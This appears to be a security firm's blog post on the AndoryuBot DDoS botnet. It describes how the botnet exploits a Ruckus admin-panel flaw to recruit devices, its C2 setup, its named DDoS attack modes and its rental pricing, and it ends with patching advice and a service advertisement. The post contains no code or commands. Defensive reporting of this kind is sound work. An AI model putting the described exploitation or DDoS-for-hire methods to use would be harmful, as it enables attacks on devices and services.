New DDoS Botnet Malware Exploiting Critical RCE Ruckus Flaw

“AndoryuBot,” a new malware, is attempting to infect unpatched Wi-Fi access points for use in DDoS attacks by exploiting a critical-severity flaw in the Ruckus Wireless Admin panel. The flaw, CVE-2023-25717, affects all Ruckus Wireless Admin panels version 10.4 and older, allowing remote threat operators to execute code by submitting unauthenticated HTTP GET requests to vulnerable devices. On February 8, 2023, the flaw was detected and fixed. However, numerous people have yet to apply the available security updates, and end-of-life models affected by the security problem won’t receive a patch. In February 2023, AndoryuBot appeared in the wild. However, one cybersecurity company claims a newer version targeting Ruckus devices appeared in mid-April. The botnet malware aims to recruit vulnerable devices to its DDoS (distributed denial of service) swarm, which it runs for profit.

The malware infects victims’ vulnerable devices through malicious HTTP GET requests before downloading an additional script from a hardcoded URL for further propagation. The cybersecurity company analyzing the variant explains that the malware can target various system architectures, including x86, arm, SPC, m68k, mips, sh4, and mpsl. The malware, after infecting devices, establishes a connection with the C2 server using the SOCKS proxying for stealth and to avoid firewalls and waits for commands.

AndoryuBot malware supports the following DDoS attack modes: tcp-raw, tcp-scoket, tcp-cnc, tcp-handshake, udp-plain, udp-game, udp-ovh, udp-raw, udp-dstat, udp-bypass, and icmp-echo. The malware will receive a directive from the command-and-control server indicating the type of DDoS, target IP address, and port number to attack. The malware’s operators allow other cybercriminals looking to execute DDoS attacks to rent out their firepower. They accept cryptocurrency payments, including XMR, BTC, ETH, USDT, and CashApp, for their services. The weekly rent prices can range from $20 for a single-connection 90-second attack launched 50 times per day using all available bots to $115 for a double-connection 200-second attack launched 100 times daily utilizing all known bots. The Andoryu project is being promoted on YouTube videos where operators demonstrate the botnet’s capabilities. Companies need to apply available firmware updates, utilize strong device administrator passwords, and disable remote admin panel access if not required to prevent botnet malware attacks.

With threat operating groups developing and utilizing new tactics and techniques, including DDoS botnet malware, to exploit vulnerabilities within software or networks, companies need to be vigilant on the current threat landscape and regularly update their software. At SpearTip, our network vulnerability assessments are essential to the risk management process. They should be conducted periodically to ensure devices on companies’ networks are not open to known vulnerabilities. We will comprehensively identify, classify, and analyze known and potential vulnerabilities, then provide actionable solutions to eliminate future cybersecurity problems. Our gap analysis allows our engineers to discover blind spots within companies by comparing technology and internal personnel that could lead to significant compromises. Our engineers go beyond simple compliance frameworks and examine the day-to-day function of cyber within companies. This leads to critical recommendations by exposing vulnerabilities in software and their people and processes. Identifying technical vulnerabilities inside and outside the organization provides a deeper context to potential environmental gaps.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.